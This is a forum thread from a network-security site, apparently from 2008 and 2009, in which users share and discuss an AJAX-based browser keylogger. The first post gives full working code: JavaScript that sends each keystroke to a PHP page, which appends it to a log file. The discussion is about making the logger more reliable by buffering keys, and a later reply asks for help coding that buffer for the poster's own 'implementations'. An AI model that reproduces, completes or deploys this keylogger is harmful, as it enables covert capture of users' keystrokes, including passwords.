Government Security
Network Security Resources

Jump to content

Photo

Ajax Keylogger.

- - - - - server javascript php xml keylogger
  • Please log in to reply
16 replies to this topic

#16 meathive

meathive

    Staff Sergeant

  • Sergeant Major
  • 254 posts

Posted 22 July 2008 - 12:38 PM

This is a topic we were working on in the Astalavista forums. A member linked to a browser-based key logger that used AJAX which I helped to push forward because it's a cool idea. I don't really care to attack anyone with it, just the idea is fun. Here is where we left off.

keylogger.js
var count=0;
  function whichButton(event) {
	  var keya = "";
	  keya=String.fromCharCode(event.charCode ? event.charCode : event.keyCode);
	  if(count>90) {keya=keya+"\n";count=0;}
	  makeRequest('test.php?iambr=' + keya);
	  document.getElementById("showKeys").value+=keya;
	  count++;
  }

test.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   <html>
   <head><script language="JavaScript" src="keylogger.js"></script>
	  <style type="text/css">
		  body{
		  background-color:#FFF;
		  font:normal 1em Arial;color:#000;
		  }
		  h2{
		  font:bold 2em Arial;color:#000;
		  margin:100px 0 0 0;
		  }
		  textarea{
		  font:normal .9em Arial;
		  color:#000;
		  border-top:20px solid #000;
		  border-left:1px dotted #000;
		  border-bottom:1px dotted #000;
		  }
		  a:link,a:visited{
		  text-decoration:underline
		  font:bold 1em Arial;
		  color:#000;
		  }
		  a:hover{
		  color:#FF0000;
		  }
	  </style>
   </head>
  <body onkeyup="whichButton(event)">
   <h2>Keylogger Demo</h2>
	   Type some keys to see them echoed back to the below textarea and/or browse to the logfile <a href="keylogger.txt">keylogger.txt</a>.
  
	   <textarea id="showKeys" rows="10" cols="150">
	  <?php
		  $_GET['iambr'];
		  $file = fopen("keylogger.txt","a");
		  fwrite($file,$_GET['iambr']);
		  fclose($file);
		  
		  $fh=fopen("keylogger.txt", "r");
		  while(!feof($fh)) $a.=fgets($fh, 1024);
		  fclose($fh);
		  $a=wordwrap($a, 90, "
  ", TRUE);
		  print $a;
	  ?>
	  </textarea>
  </body>
  </html>

The original link used a bunch of external files so using just these two greatly simplifies things. The page that does the logging hosts the HTML and links to the external JavaScript. Another cool thing is that it prints back what you're typing to the HTML textarea for demonstration purposes, of course not for IRL.

You guys are spot on about the buffer, for any moderately speedy typist, the AJAX can't quite keep up and you'll see that in the log file are missing keys all over the place. Many loggers flush the buffer when encountering a newline which would greatly improve this thing's functionality.
...oO oO oO kinqpinz.info Oo Oo Oo...
---------------------------------------------------------
# angelheaded hipsters
## burning for the ancient heavenly connection
### to the starry dynamo
#### in the machinery of night.

#17 gametricker

gametricker

    Private

  • Members
  • 3 posts

Posted 11 July 2009 - 03:25 AM

You guys are spot on about the buffer, for any moderately speedy typist, the AJAX can't quite keep up and you'll see that in the log file are missing keys all over the place. Many loggers flush the buffer when encountering a newline which would greatly improve this thing's functionality.


Hey, sorry to bring up an old topic, but how would you guys go about coding the buffer? I have a couple implementations for this script, except it can't log all the strokes.





Also tagged with one or more of these keywords: server, javascript, php, xml, keylogger